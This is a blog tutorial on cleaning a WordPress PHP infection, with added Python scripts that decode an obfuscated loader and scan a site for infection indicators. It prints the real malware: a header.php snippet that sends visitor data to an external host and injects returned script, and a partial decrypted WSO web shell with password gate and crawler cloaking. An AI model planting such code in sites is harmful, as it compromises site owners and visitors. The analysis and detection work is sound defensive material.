Remove WordPress PHP Virus

This tutorial presents a particular case in which a WordPress blog was infected with a PHP virus, and how the WordPress PHP virus was removed.

In the last few days I noticed suspicious code that appears to be a PHP virus for WordPress. The following PHP code was present in header.php, just before the </head> line.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); // hide PHP errors from the page
$wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
// Only act for Windows desktop browsers: Firefox or MSIE with " NT" in the user agent
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
    // The URL is assembled from fragments (it evaluates to http://webhttps.com/web/?ip=...), so a plain search for the domain finds nothing;
    // it reports the visitor's IP, the infected host and the user agent to the external server
    $wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
    $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);
}
// Whatever comes back is injected into the page as-is if it starts like "<script"
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

This PHP code, as shown, tries to fetch the content of a resource from an external server, but the part of the code that refers to the URL is incomplete.

The operating mechanism is somewhat more complex and makes this WordPress PHP virus invisible to visitors of the affected sites. Instead, it targets search engines (Google), which in turn leads to a significant decrease in the number of visitors to the affected websites.

WordPress PHP Malware Details

1. The above code is present in header.php.

2. A new file, wp-log.php, appeared on the server in the wp-includes folder.

3. wp-log.php contains encrypted code, which is nevertheless relatively easy to decrypt.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>
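The page does not show how the wrapper is undone, so here is an added Python example (not code from the original post) that decodes an eval(gzinflate(base64_decode('...'))) loader statically, without ever running the PHP. It goes a little beyond the sample above: it handles the other decoder functions such loaders commonly chain (gzuncompress, gzdecode, str_rot13, strrev) and peels nested layers. The sample payload is constructed in build_sample() and is harmless; the real base64 blob from wp-log.php is not reproduced.

```python
"""Static unwrapping of eval(gzinflate(base64_decode('...'))) loaders (added example)."""
import base64
import codecs
import re
import zlib

# PHP decoder functions commonly chained in such loaders, mapped to their Python equivalents.
# gzinflate() undoes raw DEFLATE (no header), gzuncompress() zlib-wrapped data, gzdecode() gzip data.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": lambda b: zlib.decompress(b),
    "gzdecode": lambda b: zlib.decompress(b, 31),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval( decoder( decoder( ... '<literal>' ) ) ) ;  -- group 1: the call chain, group 3: the literal
_LOADER_RE = re.compile(
    r"eval\s*\(\s*((?:(?:" + "|".join(DECODERS) + r")\s*\(\s*)+)"
    r"(['\"])([^'\"]*)\2\s*(?:\)\s*)+;?"
)


def unwrap_layer(source):
    """Decode the first loader found in `source` without executing it.

    Returns (decoded_text, (start, end)) or None when no loader pattern is present.
    """
    m = _LOADER_RE.search(source)
    if not m:
        return None
    chain = re.findall(r"[a-z0-9_]+", m.group(1))  # e.g. ['gzinflate', 'base64_decode']
    data = m.group(3).encode("latin-1")
    for fn in reversed(chain):  # the innermost call is applied first
        data = DECODERS[fn](data)
    decoded = data.decode("latin-1", errors="replace")
    # Drop the PHP tags of the inner payload so it can be spliced into the outer code
    decoded = re.sub(r"^\s*<\?php\s*|\s*\?>\s*$", "", decoded)
    return decoded, m.span()


def unwrap_all(source, max_layers=10):
    """Peel nested loaders until none is left; returns (final_source, layers_removed)."""
    layers = 0
    while layers < max_layers:
        res = unwrap_layer(source)
        if res is None:
            break
        decoded, (start, end) = res
        source = source[:start] + decoded + source[end:]
        layers += 1
    return source, layers


def build_sample():
    """Constructed test data: a harmless two-layer loader shaped like the wp-log.php one."""
    inner = "<?php $auth_pass = \"md5password\"; @define('WSO_VERSION', '2.5'); ?>"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, which is what gzinflate() expects
    raw = comp.compress(inner.encode()) + comp.flush()
    layer1 = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(raw).decode()
    return "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(layer1.encode()).decode()


if __name__ == "__main__":
    code, n = unwrap_all(build_sample())
    print("layers removed:", n)
    print(code)
```

The decoded text is only ever treated as data, so the sample can be unpacked on an analyst workstation; the usual next step is to read the result for an $auth_pass, a version constant or file-manager code, as the listing that follows shows.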

Decrypted malware code from wp-log.php:

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
// Answer search-engine crawlers with a 404 so the shell never gets indexed
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

// Suppress error logging and execution time limits
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    // Minimal password prompt, shown until the authentication cookie is set
    die("<pre align=center><form method=post><input type=password name=pass><input type=submit value=''></form></pre>");
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

// Password check: md5 of the POSTed password against $auth_pass, then a cookie named md5(host)
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The working directory can be switched with the POST parameter c
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

This is a PHP malware script (a web shell) containing code to manage authentication and to perform actions on files and directories on the server. It is easy to see that the script contains variables such as $auth_pass (authentication password), $default_action (default action), $default_use_ajax (whether AJAX is used by default) and $default_charset (default character set).

The script also has a section that checks the HTTP user agent in order to block certain web robots, such as search engine crawlers. Another section checks PHP safe_mode and sets the working directories.

4. If wp-log.php is opened in the browser, a web page with a password field appears. At first glance it is a file manager through which new files can easily be uploaded to the target server.

How do you clean a virus from a WordPress website?

The manual cleanup process always starts with discovering and understanding what the vulnerability was.

1. Generate a backup of the entire website. It must include both the files and the database.

2. Determine approximately when the virus appeared and search the web server for files modified or created around that time.

For example, to list the .php files created or modified in the last week, run this command on the server:

find /your/web/path -type f -name '*.php' -mtime -7 -exec ls -l {} \;

It is a simple method for separating the legitimate WordPress files from those that contain the malware.

3. Check the .htaccess file for suspicious directives, such as lines that grant script permissions or enable script execution.

4. Check the database. It is very possible that some WordPress posts and pages have been edited to include malware, or that new users with the administrator role have been added.

5. Check the write permissions of folders and files (chmod and chown).

The recommended permissions are 644 for files and 755 for directories.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Update all WordPress Plugins / WordPress Themes.
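Steps 2, 3 and 5 above can be run as one triage pass. The following Python script is an added example, not part of the original post: it walks a WordPress tree, lists .php files modified in the last N days (the find -mtime -7 check), flags content that matches the two samples on this page (an eval(gzinflate(base64_decode(...))) loader, user-agent cloaking around a curl fetch, the WSO_VERSION/FilesMan markers), reports world-writable paths and suspicious .htaccess directives. The rule names are my own, and build_sample_site() creates a constructed fixture in a temporary directory; the URL in it is a placeholder, not the one from the real sample.

```python
"""Triage scan of a WordPress tree for the indicators on this page (added example)."""
import os
import re
import stat
import tempfile
import time

# Content indicators drawn from the two malware samples above; the rule names are my own
RULES = {
    "encoded_loader": re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)\s*\(", re.I),
    "ua_cloaking": re.compile(
        r"preg_match\s*\(\s*['\"]/[^'\"]*(?:Google|Slurp|MSNBot|Yandex|Firefox|MSIE)", re.I),
    "remote_fetch": re.compile(r"curl_init\s*\(|curl_exec\s*\(", re.I),
    "webshell_marker": re.compile(r"WSO_VERSION|FilesMan"),
}
# .htaccess lines that make other extensions run as PHP or prepend a file to every request
HTACCESS_RE = re.compile(
    r"^\s*(?:AddHandler|AddType|SetHandler)\b.*php|^\s*php_value\s+auto_(?:pre|ap)pend_file", re.I)


def scan_tree(root, days=7, now=None):
    """Walk `root` and return recent PHP files, rule hits, world-writable paths and .htaccess findings."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    f = {"recent_php": [], "rule_hits": {}, "world_writable": [], "htaccess": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:          # step 5: anything writable by everyone
                f["world_writable"].append(rel)
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            if name == ".htaccess":                # step 3: suspicious directives
                for line in content.splitlines():
                    if HTACCESS_RE.search(line):
                        f["htaccess"].append((rel, line.strip()))
            elif name.endswith(".php"):
                if st.st_mtime >= cutoff:          # step 2: the find -mtime -7 check
                    f["recent_php"].append(rel)
                hits = [r for r, rx in RULES.items() if rx.search(content)]
                if hits:
                    f["rule_hits"][rel] = hits
    for key in ("recent_php", "world_writable", "htaccess"):
        f[key].sort()
    return f


def build_sample_site(root, now):
    """Constructed fixture: one clean old file, the two infected files and a bad .htaccess line."""
    def put(rel, text, mode=0o644, mtime=None):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
        os.chmod(path, mode)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

    put("wp-config.php", "<?php define('DB_NAME', 'wp'); ?>", mtime=now - 30 * 86400)
    put("wp-content/themes/demo/header.php",   # cloaking snippet shaped like the one above; URL is a placeholder
        "<?php $ua = @$_SERVER['HTTP_USER_AGENT'];\n"
        "if (preg_match('/Firefox|MSIE/i', $ua) && preg_match('/ NT/i', $ua)) {\n"
        "  $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://PLACEHOLDER.invalid/');\n"
        "  $c = curl_exec($ch); curl_close($ch); }\n?></head>")
    put("wp-includes/wp-log.php",
        "<?php eval(gzinflate(base64_decode('PLACEHOLDER_NOT_A_REAL_PAYLOAD'))); ?>", mode=0o666)
    put(".htaccess", "RewriteEngine On\nAddType application/x-httpd-php .jpg\n")


def demo_scan(days=7):
    """Build the fixture in a fresh temporary directory and scan it."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    now = time.time()
    build_sample_site(root, now)
    return scan_tree(root, days=days, now=now)


if __name__ == "__main__":
    for key, value in demo_scan().items():
        print(key, value)
```

Rule hits are leads for manual review, not verdicts: curl_init also appears in legitimate plugins, and a fresh mtime only means the file changed, so compare each flagged file against a clean copy of the same WordPress, theme or plugin version before deleting anything (step 1, the backup, comes first).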


These are the basic methods by which you can clean a WordPress website / blog of a virus. If you run into problems and need help, the comments section is open.

Passionate about technology, I have been writing with pleasure on stealthsetts.com since 2006. I have rich experience with operating systems (macOS, Windows and Linux), as well as with programming languages, blogging platforms (WordPress) and online store platforms (WooCommerce, Magento, PrestaShop).
